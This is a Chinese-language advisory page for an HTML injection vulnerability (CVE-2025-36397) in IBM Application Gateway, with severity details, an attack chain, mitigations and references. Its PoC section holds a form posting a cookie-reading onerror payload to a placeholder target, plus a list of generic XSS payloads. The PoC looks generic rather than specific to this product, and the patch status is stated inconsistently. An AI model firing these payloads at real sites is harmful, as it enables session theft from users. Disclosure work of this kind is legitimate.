CVE-2025-36397 IBM Application Gateway HTML注入漏洞

漏洞信息

漏洞编号

CVE-2025-36397

漏洞类型

HTML注入

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

IBM Application Gateway

漏洞概述

CVE-2025-36397是IBM Application Gateway中存在的一个HTML注入漏洞。该漏洞影响23.10至25.09版本。攻击者可以通过构造恶意的HTML代码注入到应用程序中，当受害者访问包含恶意代码的页面时，这些HTML代码会在受害者的Web浏览器中执行。HTML注入允许攻击者修改网页内容，插入恶意脚本，窃取用户会话信息，进行钓鱼攻击或重定向用户到恶意网站。由于该漏洞需要用户交互（UI:R）且攻击复杂度较低（AC:L），具有低权限（PR:L）的远程攻击者即可利用此漏洞。CVSS评分为5.4，属于中等严重程度。漏洞于2026年1月20日被披露，发现者为[email protected]。IBM官方已发布安全公告和修复建议，用户应及时更新到最新版本以消除安全风险。

技术细节

IBM Application Gateway 23.10至25.09版本存在HTML注入漏洞。漏洞根源在于应用程序对用户输入的HTML标签和属性缺乏充分的过滤和验证。攻击者可以在HTTP请求中注入恶意的HTML代码片段，如<script>、<img>、<iframe>等标签。当这些未经过滤的输入被回显到网页响应中时，浏览器会将其解析为有效的HTML并执行。攻击者可以利用此漏洞窃取受害者的Cookie信息、劫持用户会话、植入恶意重定向脚本或伪造登录表单进行钓鱼攻击。由于攻击复杂度低且只需要低权限账户即可发起攻击，漏洞利用门槛相对较低。建议通过输入验证、输出编码和内容安全策略（CSP）来防御此类漏洞。

攻击链分析

STEP 1

步骤1

攻击者识别目标IBM Application Gateway实例，找到可注入HTML的用户输入点

STEP 2

步骤2

攻击者构造包含恶意HTML标签（如<script>、<img>、<iframe>）的请求载荷

STEP 3

步骤3

通过POST或GET请求将恶意HTML代码提交到应用程序的输入字段

STEP 4

步骤4

应用程序未对输入进行充分过滤，将恶意HTML代码存储或回显到响应页面

STEP 5

步骤5

受害者访问包含恶意代码的页面，浏览器解析并执行注入的HTML/JavaScript

STEP 6

步骤6

攻击者通过注入的脚本窃取Cookie、会话令牌或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-36397 HTML Injection PoC -->
<!-- Example: Inject malicious HTML into IBM Application Gateway -->

<!DOCTYPE html>
<html>
<head>
    <title>CVE-2025-36397 PoC</title>
</head>
<body>
    <h2>CVE-2025-36397 HTML Injection PoC</h2>
    
    <form action="TARGET_URL" method="POST">
        <p>Inject HTML payload:</p>
        <!-- Basic HTML injection payload -->
        <input type="text" name="input_field" value='<img src=x onerror="alert(document.cookie)">'>
        <button type="submit">Submit</button>
    </form>
    
    <script>
        // Common HTML injection payloads for testing
        const payloads = [
            '<script>alert("XSS")</script>',
            '<img src=x onerror=alert(document.domain)>',
            '<iframe src="javascript:alert(document.cookie)">',
            '<svg onload=alert(document.cookie)>',
            '<a href="javascript:alert(1)">Click</a>',
            '<body onload=alert("HTML Injection")>'
        ];
        
        console.log("CVE-2025-36397 PoC Payloads:");
        payloads.forEach((p, i) => console.log(`${i+1}: ${p}`));
    </script>
</body>
</html>

影响范围

IBM Application Gateway 23.10

IBM Application Gateway 23.11

IBM Application Gateway 24.01

IBM Application Gateway 24.02

IBM Application Gateway 24.03

IBM Application Gateway 24.04

IBM Application Gateway 24.05

IBM Application Gateway 24.06

IBM Application Gateway 24.07

IBM Application Gateway 24.08

IBM Application Gateway 24.09

IBM Application Gateway 25.01

IBM Application Gateway 25.02

IBM Application Gateway 25.03

IBM Application Gateway 25.04

IBM Application Gateway 25.05

IBM Application Gateway 25.06

IBM Application Gateway 25.07

IBM Application Gateway 25.08

IBM Application Gateway 25.09

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1）限制用户输入字段的字符类型和长度；2）启用输入过滤机制移除危险的HTML标签；3）实施严格的输出编码确保特殊字符被正确转义；4）配置Web应用防火墙规则拦截包含HTML标签的异常请求；5）监控应用日志关注异常的输入模式；6）限制低权限用户对敏感功能的访问；7）向用户宣传不要点击来源不明的链接。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-36397
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-36397
3 Details https://www.cvedetails.com/cve/CVE-2025-36397/
4 VulDB https://vuldb.com/cve/CVE-2025-36397
5 Link https://www.ibm.com/support/pages/node/7256857